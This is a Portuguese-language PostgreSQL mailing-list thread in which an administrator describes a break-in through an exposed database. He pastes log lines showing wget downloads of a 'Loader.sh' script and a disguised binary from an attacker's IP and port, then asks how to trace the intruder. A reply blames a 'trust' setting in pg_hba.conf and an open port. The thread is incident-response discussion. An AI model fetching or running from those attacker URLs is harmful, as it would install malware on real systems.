Mas o postgresql não salva esses acessos em algum lugar com IP? Estranho não ter isso nos logs.
Em 20 de junho de 2016 17:49, Glauco Torres <torres.gla...@gmail.com> escreveu: > > > No dia 20 de junho de 2016 às 17:34, Anderson Cristian < > andercr...@gmail.com> escreveu: > >> Recentemente um cliente sofreu uma invasão pelo postgresql, a pessoa >> enviou um loader via sql e baixou vários arquivos maliciosos. >> >> Alguém sabe como descobrir o IP da pessoa que acessou o postgresql que >> aparentemente não estou conseguindo. >> >> Estou verificando os logs e tenho somente isso: >> >> 2016-06-15 02:05:05 EDT [15644-1] postgres@sisrh FATAL: database >> "sisrh" does not exist >> --2016-06-15 06:31:16-- http://155.94.224.246:5432/Loader.sh >> Connecting to 155.94.224.246:5432... connected. >> HTTP request sent, awaiting response... 200 OK >> Length: 1058 (1.0K) [application/octet-stream] >> Saving to: ‘/tmp/Loader.sh’ >> >> 0K . 100% >> 86.9M=0s >> >> 2016-06-15 06:31:16 (86.9 MB/s) - ‘/tmp/Loader.sh’ saved [1058/1058] >> >> scsi_eh_128: no process found >> scsi_eh_128: no process found >> scsi_eh_128: no process found >> scsi_eh_256: no process found >> scsi_eh_256: no process found >> scsi_eh_256: no process found >> scsi_eh_512: no process found >> scsi_eh_512: no process found >> scsi_eh_512: no process found >> scsi_eh_56: no process found >> scsi_eh_56: no process found >> scsi_eh_56: no process found >> scsi_eh_56: no process found >> scsi_eh_320: no process found >> scsi_eh_320: no process found >> scsi_eh_320: no process found >> --2016-06-15 06:31:16-- http://155.94.224.246:5432/scsi_eh_320 >> Connecting to 155.94.224.246:5432... connected. >> HTTP request sent, awaiting response... 200 OK >> Length: 1334372 (1.3M) [application/octet-stream] >> Saving to: ‘/tmp/scsi_eh_320’ >> >> 0K .......... .......... .......... .......... .......... 3% 90.1K >> 14s >> >> >> >> >> > Já tive um caso bem parecido, no caso os scripts que ele baixou tinha como > destino ou eram oriundos de IPs da China, > > Mais do que isso só uma perícia, a questão é que quem faz isso não usa seu > próprio IP para fazer isso, então gastar uma grana em um perito pode não > dar em nada. > > No caso que eu estou citando o pg_hba.conf estava como trust e o a porta > padrão do postgres estava escancarada para toda www facilitando qual quer > tipo de ataque. > > ------------- > Glauco Torres > > _______________________________________________ > pgbr-geral mailing list > pgbr-geral@listas.postgresql.org.br > https://listas.postgresql.org.br/cgi-bin/mailman/listinfo/pgbr-geral > -- Anderson Silva
_______________________________________________ pgbr-geral mailing list pgbr-geral@listas.postgresql.org.br https://listas.postgresql.org.br/cgi-bin/mailman/listinfo/pgbr-geral
